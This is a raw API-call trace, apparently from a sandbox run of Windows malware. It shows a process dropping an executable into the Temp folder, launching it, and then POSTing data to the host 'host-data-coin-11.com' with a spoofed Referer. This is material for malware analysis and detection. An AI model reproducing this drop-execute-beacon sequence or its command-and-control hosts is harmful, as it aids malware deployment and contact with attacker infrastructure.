RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80120) returned 1 [0238.732] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a800c0) returned 0x50 [0238.732] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a800c0) returned 1 [0238.732] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a800a0) returned 0x13 [0238.732] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a800a0) returned 1 [0238.732] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x210) returned 0x9a800a0 [0238.733] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x210) returned 0x9a802c0 [0238.733] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x9a802c0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0238.733] lstrcatW (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" [0238.733] GetTempFileNameW (in: lpPathName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x9a802c0 | out: lpTempFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.tmp")) returned 0x69be [0238.735] DeleteFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.tmp")) returned 1 [0238.735] lstrlenW (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.tmp") returned 45 [0238.735] lstrcatW (in: lpString1="", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE" [0238.735] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802c0) returned 0x210 [0238.736] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802c0) returned 1 [0238.736] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a802c0 [0238.736] lstrcatW (in: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE", lpString2=".exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" [0238.736] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a802c0) returned 0x12 [0238.736] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a802c0) returned 1 [0238.736] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xce0 [0238.736] WriteFile (in: hFile=0xce0, lpBuffer=0xa000000*, nNumberOfBytesToWrite=0x3795a8, lpNumberOfBytesWritten=0x75df5f8, lpOverlapped=0x0 | out: lpBuffer=0xa000000*, lpNumberOfBytesWritten=0x75df5f8*=0x3795a8, lpOverlapped=0x0) returned 1 [0238.926] CloseHandle (hObject=0xce0) returned 1 [0238.997] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName=0x0, lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpStartupInfo=0x75df620*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x75df600, hNewToken=0x0 | out: lpProcessInformation=0x75df600*(hProcess=0x1534, hThread=0xce0, dwProcessId=0xfb0, dwThreadId=0xfb4), hNewToken=0x0) returned 1 [0239.640] CloseHandle (hObject=0x1534) returned 1 [0239.640] CloseHandle (hObject=0xce0) returned 1 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b39ede8 [0239.640] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0xa4) returned 0x9a802c0 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43356332 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x67ede590 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1d86193f [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2660aeb8 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9ba3008 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3527b35d [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1c8c0e64 [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x649038da [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3de3255e [0239.640] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3aae1b98 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x58cdfaad [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5fc20f0b [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6aee8f36 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5664659c [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x115700e2 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf852dac [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x61345a38 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x41b5faf9 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x343e554b [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e26fcb7 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x360b9baf [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x71ddaab2 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x59811e5b [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5212c590 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3ad3d5b1 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x419e547b [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4552d20e [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6ddc0061 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x19a16bac [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4403bfb6 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x328e1cde [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4b5f4288 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7bdc8d73 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c2c5744 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50ca6d17 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7859a0e9 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x778a984a [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1de96801 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x112ea8ee [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x313c569b [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26075f1f [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x161e5a0f [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x478d03b5 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47e1efdd [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ee017b1 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x407661f2 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b469c84 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4151ddeb [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x68a2c9a9 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x721d222f [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x29048968 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47893e28 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x537b4f90 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ed320b0 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5db7f802 [0239.641] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x476a700a [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5d1af949 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x26cb141f [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x704c49ec [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2c6f4e28 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x43230ac1 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x18414a7f [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x478e16fe [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7508fe75 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x31085570 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xf918fee [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x683e6534 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x10a5677f [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7201f820 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15d3fae7 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7180a071 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9b2af51 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x47f7dd0d [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x464ac526 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x540b3ec1 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b67a58b [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x12fc04db [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x584ce504 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x709274cf [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x67c3e105 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x318f469 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ba36f6 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2db658c5 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15696a90 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x15b3c926 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x705ee83a [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2ddbab0f [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x53338480 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x13e5b22c [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x620edc5c [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3661ceee [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6cbcbfee [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64b147d0 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x79ecc3b3 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b9ce20d [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4baec22a [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5aba80f8 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17ae8ca5 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x196ae272 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x412ba2b2 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1ee2ee47 [0239.642] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7e69ff2f [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64f94607 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x17359626 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x64dbf2c4 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5392caf3 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x887e0a2 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x105c61db [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4ba8c8f0 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5b94fc2a [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x445af0f0 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16ff2ca2 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x16d7560e [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2b0c119e [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x21423ad4 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2d64878e [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4eee77c1 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4860d35f [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x69108f92 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x78ea050b [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5015cb09 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3678fd62 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55ba1c26 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5f252192 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7120b48d [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49944a0b [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x516fac10 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7a1ae10c [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x795bdb14 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5616bb9a [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x463f0636 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x49e68057 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x9a6805e [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x208d93c8 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0xfd51e29 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x733b9426 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x208f6e6f [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x343a2d5b [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1dae566e [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x75511ed3 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x179242de [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57b74c24 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5fd20c4e [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x426318d9 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7077dfd3 [0239.643] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x2a974b5 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x57678537 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x7b8337e7 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3fc626a [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4dcaf99b [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x70969682 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x77475604 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4949e3d6 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4f63a372 [0239.644] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x1aa2cd1c [0239.644] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0xf3) returned 0x9a80370 [0239.644] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0239.644] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0239.644] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0239.644] lstrcatA (in: lpString1="", lpString2="keJK;4-Gk'Jlme]5I:4zDUf'zX?r]WsK>Q*nQ(C&6drTb;YnT\\OIW!Ok6d#Q&bu\"Mm%r5tptxaD`jsJB\"wnOaONC5CISmJ`Ssdc[:tT9U\\%pe))Q75uAj*q:.]UY\"6S+1M[87g>]rrWpsUq\"&$`098#+AqO" | out: lpString1="keJK;4-Gk'Jlme]5I:4zDUf'zX?r]WsK>Q*nQ(C&6drTb;YnT\\OIW!Ok6d#Q&bu\"Mm%r5tptxaD`jsJB\"wnOaONC5CISmJ`Ssdc[:tT9U\\%pe))Q75uAj*q:.]UY\"6S+1M[87g>]rrWpsUq\"&$`098#+AqO") returned="keJK;4-Gk'Jlme]5I:4zDUf'zX?r]WsK>Q*nQ(C&6drTb;YnT\\OIW!Ok6d#Q&bu\"Mm%r5tptxaD`jsJB\"wnOaONC5CISmJ`Ssdc[:tT9U\\%pe))Q75uAj*q:.]UY\"6S+1M[87g>]rrWpsUq\"&$`098#+AqO" [0239.644] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10c) returned 0x9a80470 [0239.644] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0239.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x97d2300, cbMultiByte=30, lpWideCharStr=0x9a80470, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0239.644] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x75df3c8 | out: pProxyConfig=0x75df3c8) returned 1 [0239.839] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3ea9ba0 [0239.840] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x75df480 | out: lpUrlComponents=0x75df480) returned 1 [0239.840] WinHttpConnect (hSession=0x3ea9ba0, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3faa0e0 [0239.840] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a80590 [0239.840] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x68) returned 0x9a805b0 [0239.840] WinHttpOpenRequest (hConnect=0x3faa0e0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x3eeadd0 [0239.840] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x4e) returned 0x9a80620 [0239.840] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x10d) returned 0x9a80680 [0239.840] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e1de8a [0239.840] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x12) returned 0x9a807a0 [0239.841] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x17) returned 0x9a807c0 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x6f7fbf76 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x4fafaf91 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5e948d50 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55a2ce9f [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5a5a3849 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x55313af0 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x5ec5d91e [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x35736177 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x50c61174 [0239.841] RtlRandomEx (in: Seed=0x27a0e9e | out: Seed=0x27a0e9e) returned 0x3e9d8e13 [0239.841] wsprintfW (in: param_1=0x9a80680, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://jimomdobp.net/") returned 43 [0239.841] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a807c0) returned 0x17 [0239.841] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a807c0) returned 1 [0239.841] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a807a0) returned 0x12 [0239.841] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a807a0) returned 1 [0239.841] RtlSizeHeap (HeapHandle=0x97d0000, Flags=0x0, MemoryPointer=0x9a80620) returned 0x4e [0239.841] RtlFreeHeap (HeapHandle=0x97d0000, Flags=0x0, BaseAddress=0x9a80620) returned 1 [0239.842] WinHttpAddRequestHeaders (hRequest=0x3eeadd0, pwszHeaders="Accept: */*\r\nReferer: http://jimomdobp.net/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0239.842] WinHttpSendRequest (hRequest=0x3eeadd0, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x9a80370*, dwOptionalLength=0xea, dwTotalLength=0xea, dwContext=0x0) returned 1 [0240.184] WinHttpReceiveResponse (hRequest=0x3eeadd0, lpReserved=0x0) returned 1 [0240.184] RtlAllocateHeap (HeapHandle=0x97d0000, Flags=0x8, Size=0x2800) returned 0x97e4080 [0240.184] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e4080, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df538 | out: lpBuffer=0x97e4080*, lpdwNumberOfBytesRead=0x75df538*=0x199) returned 1 [0240.184] RtlReAllocateHeap (Heap=0x97d0000, Flags=0x8, Ptr=0x97e4080, Size=0x5000) returned 0x97e4080 [0240.184] WinHttpReadData (in: hRequest=0x3eeadd0, lpBuffer=0x97e4219, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x75df538 | out: lpBuffer=0x97e4219*, lpdwNumberOfBytesRead=0x75df538*=0x0) returned 1 [0240.185] VirtualAlloc (lpAddress=0x0, dwSize=0x199, flAllocationType=0x3000, flProtect=0x4) returned 0x2670000 